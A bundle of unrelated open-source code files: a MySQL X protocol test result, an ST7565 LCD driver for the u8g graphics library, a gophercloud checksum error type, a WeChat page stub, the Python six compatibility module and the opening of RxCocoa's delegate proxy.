# of the different types (StmtExecute, Expect.Open)
#
# I.1
1
1
0 rows affected
#
# I.2
RUN recvok
#
# I.3
2
2
0 rows affected
3
3
0 rows affected
4
4
0 rows affected
#
# I.4
RUN recvok
5
5
0 rows affected
command ok
Mysqlx.Ok {
msg: "bye!"
}
ok
| {
"pile_set_name": "Github"
} |
/*
u8g_dev_st7565_64128n.c (Displaytech)
Universal 8bit Graphics Library
Copyright (c) 2011, [email protected]
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or other
materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "u8g.h"
#define WIDTH 128
#define HEIGHT 64
#define PAGE_HEIGHT 8
/* init sequence from https://github.com/adafruit/ST7565-LCD/blob/master/ST7565/ST7565.cpp */
/* Panel power-up sequence: reset pulse, bias/ADC/scan-direction setup,
   staged voltage rails with settle delays, contrast, display-on, then a
   brief all-points-on flash before switching to normal display. */
static const uint8_t u8g_dev_st7565_64128n_init_seq[] PROGMEM = {
  U8G_ESC_CS(0),     /* disable chip */
  U8G_ESC_ADR(0),    /* instruction mode */
  U8G_ESC_CS(1),     /* enable chip */
  U8G_ESC_RST(15),   /* do reset low pulse with (15*16)+2 milliseconds (=maximum delay)*/
  0x0A2,             /* 0x0a2: LCD bias 1/9 (according to Displaytech 64128N datasheet) */
  0x0A0,             /* Normal ADC Select (according to Displaytech 64128N datasheet) */
  0x0c8,             /* common output mode: set scan direction normal operation/SHL Select, 0x0c0 --> SHL = 0, normal, 0x0c8 --> SHL = 1 */
  0x040,             /* Display start line for Displaytech 64128N */
  0x028 | 0x04,      /* power control: turn on voltage converter */
  U8G_ESC_DLY(50),   /* delay 50 ms */
  0x028 | 0x06,      /* power control: turn on voltage regulator */
  U8G_ESC_DLY(50),   /* delay 50 ms */
  0x028 | 0x07,      /* power control: turn on voltage follower */
  U8G_ESC_DLY(50),   /* delay 50 ms */
  0x010,             /* Set V0 voltage resistor ratio. Setting for controlling brightness of Displaytech 64128N */
  0x0a6,             /* display normal, bit val 0: LCD pixel off. */
  0x081,             /* set contrast */
  0x01e,             /* Contrast value. Setting for controlling brightness of Displaytech 64128N */
  0x0af,             /* display on */
  U8G_ESC_DLY(100),  /* delay 100 ms */
  0x0a5,             /* display all points, ST7565 */
  U8G_ESC_DLY(100),  /* delay 100 ms */
  U8G_ESC_DLY(100),  /* delay 100 ms */
  0x0a4,             /* normal display */
  U8G_ESC_CS(0),     /* disable chip */
  U8G_ESC_END        /* end of sequence */
};
/* Prefix sent before each page of frame-buffer data: enters instruction
   mode and resets the column address to 0 for this panel. */
static const uint8_t u8g_dev_st7565_64128n_data_start[] PROGMEM = {
  U8G_ESC_ADR(0),    /* instruction mode */
  U8G_ESC_CS(1),     /* enable chip */
  0x010,             /* set upper 4 bit of the col adr to 0x10 */
  0x000,             /* set lower 4 bit of the col adr to 0x00. Changed for DisplayTech 64128N */
  U8G_ESC_END        /* end of sequence */
};
/* Sequence sent on U8G_DEV_MSG_SLEEP_ON: indicator off, display off,
   all-points-on (the ST7565 power-save idiom). */
static const uint8_t u8g_dev_st7565_64128n_sleep_on[] PROGMEM = {
  U8G_ESC_ADR(0),    /* instruction mode */
  U8G_ESC_CS(1),     /* enable chip */
  0x0ac,             /* static indicator off */
  0x000,             /* indicator register set (not sure if this is required) */
  0x0ae,             /* display off */
  0x0a5,             /* all points on */
  U8G_ESC_CS(1),     /* NOTE(review): comment previously said "disable chip" but the value asserts CS again; confirm whether this should be U8G_ESC_CS(0) */
  U8G_ESC_END        /* end of sequence */
};
/* Sequence sent on U8G_DEV_MSG_SLEEP_OFF: leave all-points-on mode and
   turn the display back on, with a settle delay. */
static const uint8_t u8g_dev_st7565_64128n_sleep_off[] PROGMEM = {
  U8G_ESC_ADR(0),    /* instruction mode */
  U8G_ESC_CS(1),     /* enable chip */
  0x0a4,             /* all points off */
  0x0af,             /* display on */
  U8G_ESC_DLY(50),   /* delay 50 ms */
  U8G_ESC_CS(1),     /* NOTE(review): comment previously said "disable chip" but the value asserts CS again; confirm whether this should be U8G_ESC_CS(0) */
  U8G_ESC_END        /* end of sequence */
};
/* u8g device message handler for the ST7565-based Displaytech 64128N.
   Handles init, page output, contrast and sleep messages; everything else
   (including U8G_DEV_MSG_STOP) is delegated to the generic 8-bit page
   buffer implementation. */
uint8_t u8g_dev_st7565_64128n_fn(u8g_t *u8g, u8g_dev_t *dev, uint8_t msg, void *arg)
{
  if (msg == U8G_DEV_MSG_INIT)
  {
    /* bring up the communication interface, then run the panel init sequence */
    u8g_InitCom(u8g, dev);
    u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_init_seq);
  }
  else if (msg == U8G_DEV_MSG_PAGE_NEXT)
  {
    u8g_pb_t *page_buffer = (u8g_pb_t *)(dev->dev_mem);
    u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_data_start);
    u8g_WriteByte(u8g, dev, 0x0b0 | page_buffer->p.page);  /* select current page (ST7565R) */
    u8g_SetAddress(u8g, dev, 1);                           /* data mode */
    if (u8g_pb_WriteBuffer(page_buffer, u8g, dev) == 0)
      return 0;
    u8g_SetChipSelect(u8g, dev, 0);
  }
  else if (msg == U8G_DEV_MSG_CONTRAST)
  {
    /* contrast byte is scaled down from u8g's 0..255 range to 0..63 */
    u8g_SetChipSelect(u8g, dev, 1);
    u8g_SetAddress(u8g, dev, 0);  /* instruction mode */
    u8g_WriteByte(u8g, dev, 0x081);
    u8g_WriteByte(u8g, dev, (*(uint8_t *)arg) >> 2);
    u8g_SetChipSelect(u8g, dev, 0);
    return 1;
  }
  else if (msg == U8G_DEV_MSG_SLEEP_ON)
  {
    u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_sleep_on);
    return 1;
  }
  else if (msg == U8G_DEV_MSG_SLEEP_OFF)
  {
    u8g_WriteEscSeqP(u8g, dev, u8g_dev_st7565_64128n_sleep_off);
    return 1;
  }
  /* U8G_DEV_MSG_STOP and all unhandled messages fall through to the base handler */
  return u8g_dev_pb8v1_base_fn(u8g, dev, msg, arg);
}
/* Device descriptors: a page buffer (PAGE_HEIGHT rows per pass) bound to the
   message handler above, one for software SPI and one for hardware SPI. */
U8G_PB_DEV(u8g_dev_st7565_64128n_sw_spi, WIDTH, HEIGHT, PAGE_HEIGHT, u8g_dev_st7565_64128n_fn, U8G_COM_SW_SPI);
U8G_PB_DEV(u8g_dev_st7565_64128n_hw_spi, WIDTH, HEIGHT, PAGE_HEIGHT, u8g_dev_st7565_64128n_fn, U8G_COM_HW_SPI);
| {
"pile_set_name": "Github"
} |
package objects
import "github.com/gophercloud/gophercloud"
// ErrWrongChecksum is the error when the checksum generated for an object
// doesn't match the ETAG header.
type ErrWrongChecksum struct {
	gophercloud.BaseError
}

// Error returns a fixed description of the checksum mismatch, satisfying
// the built-in error interface.
func (e ErrWrongChecksum) Error() string {
	return "Local checksum does not match API ETag header"
}
| {
"pile_set_name": "Github"
} |
<!--pages/mainStore/mainStore.wxml-->
<text>pages/mainStore/mainStore.wxml</text>
| {
"pile_set_name": "Github"
} |
"""Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.4.1"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3

if PY3:
    # On Python 3 the 2.x type splits collapse into single built-ins.
    string_types = str,
    integer_types = int,
    class_types = type,
    text_type = str
    binary_type = bytes

    MAXSIZE = sys.maxsize
else:
    string_types = basestring,
    integer_types = (int, long)
    class_types = (type, types.ClassType)
    text_type = unicode
    binary_type = str

    if sys.platform.startswith("java"):
        # Jython always uses 32 bits.
        MAXSIZE = int((1 << 31) - 1)
    else:
        # It's possible to have sizeof(long) != sizeof(Py_ssize_t).
        # Probe the platform: __len__ returning 2**31 overflows Py_ssize_t
        # on 32-bit builds, which distinguishes the two cases.
        class X(object):
            def __len__(self):
                return 1 << 31
        try:
            len(X())
        except OverflowError:
            # 32-bit
            MAXSIZE = int((1 << 31) - 1)
        else:
            # 64-bit
            MAXSIZE = int((1 << 63) - 1)
        del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
    """Descriptor that resolves its target on first access, then caches it.

    Subclasses must provide ``_resolve()``.  After the first lookup the
    resolved object is stored on the instance and the descriptor removes
    itself from the class, so later accesses are plain attribute reads.
    """

    def __init__(self, name):
        # Attribute name under which the resolved object will be cached.
        self.name = name

    def __get__(self, obj, tp):
        result = self._resolve()
        setattr(obj, self.name, result)
        # This is a bit ugly, but it avoids running this again.
        delattr(tp, self.name)
        return result
class MovedModule(_LazyDescr):
    """Lazy placeholder for a module that was renamed between Python 2 and 3.

    ``old`` is the Python 2 module name; ``new`` (defaulting to ``name``)
    is the Python 3 name.  The import is deferred until first access via
    the ``_LazyDescr`` protocol.
    """

    def __init__(self, name, old, new=None):
        super(MovedModule, self).__init__(name)
        if PY3:
            if new is None:
                new = name
            self.mod = new
        else:
            self.mod = old

    def _resolve(self):
        # Import the version-appropriate module lazily.
        return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
    """Lazy placeholder for an attribute that moved between Python 2 and 3.

    Records the (module, attribute) pair appropriate for the running
    interpreter; resolution is deferred until first access.
    """

    def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
        super(MovedAttribute, self).__init__(name)
        if PY3:
            # Python 3: module and attribute names default to ``name``,
            # falling back to the Python 2 attribute name if given.
            self.mod = name if new_mod is None else new_mod
            if new_attr is None:
                new_attr = name if old_attr is None else old_attr
            self.attr = new_attr
        else:
            # Python 2: use the old module; attribute defaults to ``name``.
            self.mod = old_mod
            self.attr = name if old_attr is None else old_attr

    def _resolve(self):
        # Fetch the attribute from its version-appropriate home module.
        return getattr(_import_module(self.mod), self.attr)
class _MovedItems(types.ModuleType):
    """Lazy loading of moved objects"""


# Table of everything exposed under six.moves: MovedAttribute entries for
# relocated functions/classes, MovedModule entries for renamed modules.
_moved_attributes = [
    MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
    MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
    MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
    MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
    MovedAttribute("map", "itertools", "builtins", "imap", "map"),
    MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
    MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
    MovedAttribute("reduce", "__builtin__", "functools"),
    MovedAttribute("StringIO", "StringIO", "io"),
    MovedAttribute("UserString", "UserString", "collections"),
    MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
    MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
    MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
    MovedModule("builtins", "__builtin__"),
    MovedModule("configparser", "ConfigParser"),
    MovedModule("copyreg", "copy_reg"),
    MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
    MovedModule("http_cookies", "Cookie", "http.cookies"),
    MovedModule("html_entities", "htmlentitydefs", "html.entities"),
    MovedModule("html_parser", "HTMLParser", "html.parser"),
    MovedModule("http_client", "httplib", "http.client"),
    MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
    MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
    MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
    MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
    MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
    MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
    MovedModule("cPickle", "cPickle", "pickle"),
    MovedModule("queue", "Queue"),
    MovedModule("reprlib", "repr"),
    MovedModule("socketserver", "SocketServer"),
    MovedModule("tkinter", "Tkinter"),
    MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
    MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
    MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
    MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
    MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
    MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
    MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
    MovedModule("tkinter_colorchooser", "tkColorChooser",
                "tkinter.colorchooser"),
    MovedModule("tkinter_commondialog", "tkCommonDialog",
                "tkinter.commondialog"),
    MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
    MovedModule("tkinter_font", "tkFont", "tkinter.font"),
    MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
    MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
                "tkinter.simpledialog"),
    MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
    MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
    MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
    MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
    MovedModule("winreg", "_winreg"),
]

# Install each moved item as a lazy class attribute on _MovedItems.
for attr in _moved_attributes:
    setattr(_MovedItems, attr.name, attr)
del attr

# Register the pseudo-module so "import six.moves" works.
moves = sys.modules[__name__ + ".moves"] = _MovedItems(__name__ + ".moves")
class Module_six_moves_urllib_parse(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_parse"""


_urllib_parse_moved_attributes = [
    MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
    MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
    MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
    MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
    MovedAttribute("urljoin", "urlparse", "urllib.parse"),
    MovedAttribute("urlparse", "urlparse", "urllib.parse"),
    MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
    MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
    MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
    MovedAttribute("quote", "urllib", "urllib.parse"),
    MovedAttribute("quote_plus", "urllib", "urllib.parse"),
    MovedAttribute("unquote", "urllib", "urllib.parse"),
    MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
    MovedAttribute("urlencode", "urllib", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
    setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr

# Register under both spellings: the flat alias and the dotted package path.
sys.modules[__name__ + ".moves.urllib_parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse")
sys.modules[__name__ + ".moves.urllib.parse"] = Module_six_moves_urllib_parse(__name__ + ".moves.urllib.parse")
class Module_six_moves_urllib_error(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_error"""


_urllib_error_moved_attributes = [
    MovedAttribute("URLError", "urllib2", "urllib.error"),
    MovedAttribute("HTTPError", "urllib2", "urllib.error"),
    MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
    setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr

# Register under both spellings: the flat alias and the dotted package path.
sys.modules[__name__ + ".moves.urllib_error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib_error")
sys.modules[__name__ + ".moves.urllib.error"] = Module_six_moves_urllib_error(__name__ + ".moves.urllib.error")
class Module_six_moves_urllib_request(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_request"""


_urllib_request_moved_attributes = [
    MovedAttribute("urlopen", "urllib2", "urllib.request"),
    MovedAttribute("install_opener", "urllib2", "urllib.request"),
    MovedAttribute("build_opener", "urllib2", "urllib.request"),
    MovedAttribute("pathname2url", "urllib", "urllib.request"),
    MovedAttribute("url2pathname", "urllib", "urllib.request"),
    MovedAttribute("getproxies", "urllib", "urllib.request"),
    MovedAttribute("Request", "urllib2", "urllib.request"),
    MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
    MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
    MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
    MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
    MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
    MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
    MovedAttribute("FileHandler", "urllib2", "urllib.request"),
    MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
    MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
    MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
    MovedAttribute("urlretrieve", "urllib", "urllib.request"),
    MovedAttribute("urlcleanup", "urllib", "urllib.request"),
    MovedAttribute("URLopener", "urllib", "urllib.request"),
    MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
    setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr

# Register under both spellings: the flat alias and the dotted package path.
sys.modules[__name__ + ".moves.urllib_request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib_request")
sys.modules[__name__ + ".moves.urllib.request"] = Module_six_moves_urllib_request(__name__ + ".moves.urllib.request")
class Module_six_moves_urllib_response(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_response"""


_urllib_response_moved_attributes = [
    MovedAttribute("addbase", "urllib", "urllib.response"),
    MovedAttribute("addclosehook", "urllib", "urllib.response"),
    MovedAttribute("addinfo", "urllib", "urllib.response"),
    MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
    setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr

# Register under both spellings: the flat alias and the dotted package path.
sys.modules[__name__ + ".moves.urllib_response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib_response")
sys.modules[__name__ + ".moves.urllib.response"] = Module_six_moves_urllib_response(__name__ + ".moves.urllib.response")
class Module_six_moves_urllib_robotparser(types.ModuleType):
    """Lazy loading of moved objects in six.moves.urllib_robotparser"""


_urllib_robotparser_moved_attributes = [
    MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
    setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr

# Register under both spellings: the flat alias and the dotted package path.
sys.modules[__name__ + ".moves.urllib_robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib_robotparser")
sys.modules[__name__ + ".moves.urllib.robotparser"] = Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
    """Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
    # These read back the pseudo-modules registered by the blocks above.
    parse = sys.modules[__name__ + ".moves.urllib_parse"]
    error = sys.modules[__name__ + ".moves.urllib_error"]
    request = sys.modules[__name__ + ".moves.urllib_request"]
    response = sys.modules[__name__ + ".moves.urllib_response"]
    robotparser = sys.modules[__name__ + ".moves.urllib_robotparser"]


sys.modules[__name__ + ".moves.urllib"] = Module_six_moves_urllib(__name__ + ".moves.urllib")
def add_move(move):
    """Add an item to six.moves."""
    setattr(_MovedItems, move.name, move)


def remove_move(name):
    """Remove item from six.moves.

    Raises AttributeError if *name* is neither a pending lazy attribute on
    _MovedItems nor an already-resolved entry cached on the moves module.
    """
    try:
        delattr(_MovedItems, name)
    except AttributeError:
        try:
            del moves.__dict__[name]
        except KeyError:
            raise AttributeError("no such move, %r" % (name,))
# Version-specific attribute names used by the accessor helpers below
# (get_method_function, iterkeys, ...).
if PY3:
    _meth_func = "__func__"
    _meth_self = "__self__"

    _func_closure = "__closure__"
    _func_code = "__code__"
    _func_defaults = "__defaults__"
    _func_globals = "__globals__"

    _iterkeys = "keys"
    _itervalues = "values"
    _iteritems = "items"
    _iterlists = "lists"
else:
    _meth_func = "im_func"
    _meth_self = "im_self"

    _func_closure = "func_closure"
    _func_code = "func_code"
    _func_defaults = "func_defaults"
    _func_globals = "func_globals"

    _iterkeys = "iterkeys"
    _itervalues = "itervalues"
    _iteritems = "iteritems"
    _iterlists = "iterlists"
# next() was added as a builtin in Python 2.6; fall back to calling the
# iterator's .next() method on older interpreters.
try:
    advance_iterator = next
except NameError:
    def advance_iterator(it):
        return it.next()
next = advance_iterator


# callable() was removed in Python 3.0/3.1; emulate it via __call__ lookup
# on the MRO when the builtin is missing.
try:
    callable = callable
except NameError:
    def callable(obj):
        return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
    # Python 3 has no "unbound method" wrapper: functions are returned as-is.
    def get_unbound_function(unbound):
        return unbound

    create_bound_method = types.MethodType

    Iterator = object
else:
    def get_unbound_function(unbound):
        return unbound.im_func

    def create_bound_method(func, obj):
        return types.MethodType(func, obj, obj.__class__)

    # Base class mapping Python 2's next() onto a subclass's __next__().
    class Iterator(object):

        def next(self):
            return type(self).__next__(self)

    callable = callable
_add_doc(get_unbound_function,
         """Get the function out of a possibly unbound function""")
# Accessors for function/method internals whose attribute names differ
# between Python 2 (im_func, func_code, ...) and 3 (__func__, __code__, ...);
# the _meth_*/_func_* names are selected above based on PY3.
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
def iterkeys(d, **kw):
    """Return an iterator over the keys of a dictionary."""
    return iter(getattr(d, _iterkeys)(**kw))


def itervalues(d, **kw):
    """Return an iterator over the values of a dictionary."""
    return iter(getattr(d, _itervalues)(**kw))


def iteritems(d, **kw):
    """Return an iterator over the (key, value) pairs of a dictionary."""
    return iter(getattr(d, _iteritems)(**kw))


def iterlists(d, **kw):
    """Return an iterator over the (key, [values]) pairs of a dictionary."""
    return iter(getattr(d, _iterlists)(**kw))
if PY3:
    def b(s):
        return s.encode("latin-1")
    def u(s):
        return s
    unichr = chr
    if sys.version_info[1] <= 1:
        def int2byte(i):
            return bytes((i,))
    else:
        # This is about 2x faster than the implementation above on 3.2+
        int2byte = operator.methodcaller("to_bytes", 1, "big")
    byte2int = operator.itemgetter(0)
    indexbytes = operator.getitem
    iterbytes = iter
    import io
    StringIO = io.StringIO
    BytesIO = io.BytesIO
else:
    def b(s):
        return s
    def u(s):
        return unicode(s, "unicode_escape")
    unichr = unichr
    int2byte = chr
    def byte2int(bs):
        return ord(bs[0])
    def indexbytes(buf, i):
        return ord(buf[i])
    def iterbytes(buf):
        return (ord(byte) for byte in buf)
    import StringIO
    StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
    import builtins
    exec_ = getattr(builtins, "exec")

    def reraise(tp, value, tb=None):
        if value.__traceback__ is not tb:
            raise value.with_traceback(tb)
        raise value

    print_ = getattr(builtins, "print")
    del builtins

else:
    def exec_(_code_, _globs_=None, _locs_=None):
        """Execute code in a namespace."""
        if _globs_ is None:
            # Default to the caller's globals/locals.
            frame = sys._getframe(1)
            _globs_ = frame.f_globals
            if _locs_ is None:
                _locs_ = frame.f_locals
            del frame
        elif _locs_ is None:
            _locs_ = _globs_
        exec("""exec _code_ in _globs_, _locs_""")

    # The bare-raise form is a syntax error on Python 3, so it must be
    # defined through exec_ to keep this file importable everywhere.
    exec_("""def reraise(tp, value, tb=None):
    raise tp, value, tb
""")

    def print_(*args, **kwargs):
        """The new-style print function."""
        fp = kwargs.pop("file", sys.stdout)
        if fp is None:
            return
        def write(data):
            if not isinstance(data, basestring):
                data = str(data)
            fp.write(data)
        # If any argument (or sep/end) is unicode, write everything as unicode.
        want_unicode = False
        sep = kwargs.pop("sep", None)
        if sep is not None:
            if isinstance(sep, unicode):
                want_unicode = True
            elif not isinstance(sep, str):
                raise TypeError("sep must be None or a string")
        end = kwargs.pop("end", None)
        if end is not None:
            if isinstance(end, unicode):
                want_unicode = True
            elif not isinstance(end, str):
                raise TypeError("end must be None or a string")
        if kwargs:
            raise TypeError("invalid keyword arguments to print()")
        if not want_unicode:
            for arg in args:
                if isinstance(arg, unicode):
                    want_unicode = True
                    break
        if want_unicode:
            newline = unicode("\n")
            space = unicode(" ")
        else:
            newline = "\n"
            space = " "
        if sep is None:
            sep = space
        if end is None:
            end = newline
        for i, arg in enumerate(args):
            if i:
                write(sep)
            write(arg)
        write(end)

_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, *bases):
    """Create a base class with a metaclass.

    Returns a new class named ``NewBase`` created by *meta*; subclassing the
    result applies the metaclass on both Python 2 and Python 3.
    """
    return meta("NewBase", bases, {})
def add_metaclass(metaclass):
    """Class decorator for creating a class with a metaclass.

    Rebuilds the decorated class via *metaclass*, copying its namespace but
    dropping __dict__/__weakref__ (and any __slots__ entries) so the new
    class does not carry stale descriptors from the original.
    """
    def wrapper(cls):
        orig_vars = cls.__dict__.copy()
        orig_vars.pop('__dict__', None)
        orig_vars.pop('__weakref__', None)
        for slots_var in orig_vars.get('__slots__', ()):
            orig_vars.pop(slots_var)
        return metaclass(cls.__name__, cls.__bases__, orig_vars)
    return wrapper
| {
"pile_set_name": "Github"
} |
//
// _RXDelegateProxy.m
// RxCocoa
//
// Created by Krunoslav Zaher on 7/4/15.
// Copyright © 2015 Krunoslav Zaher. All rights reserved.
//
#import "include/_RXDelegateProxy.h"
#import "include/_RX.h"
#import "include/_RXObjCRuntime.h"
@interface _RXDelegateProxy () {
    // Weak by default so the proxy does not keep the forwarded delegate
    // alive; a strong reference is held only when explicitly requested
    // via -_setForwardToDelegate:retainDelegate:.
    id __weak __forwardToDelegate;
}

// Strong reference slot used only when retainDelegate == YES.
@property (nonatomic, strong) id strongForwardDelegate;

@end

// Maps each proxy class (wrapped with CLASS_VALUE) to the NSSet of
// void-returning delegate selectors it recognizes; filled in +initialize.
static NSMutableDictionary *voidSelectorsPerClass = nil;

@implementation _RXDelegateProxy

// Collects selectors of void-returning optional instance methods declared on
// `protocol` and, recursively, on every protocol it adopts.
+(NSSet*)collectVoidSelectorsForProtocol:(Protocol *)protocol {
    NSMutableSet *selectors = [NSMutableSet set];

    // Optional instance methods only (isRequiredMethod = NO,
    // isInstanceMethod = YES).
    unsigned int protocolMethodCount = 0;
    struct objc_method_description *pMethods = protocol_copyMethodDescriptionList(protocol, NO, YES, &protocolMethodCount);

    for (unsigned int i = 0; i < protocolMethodCount; ++i) {
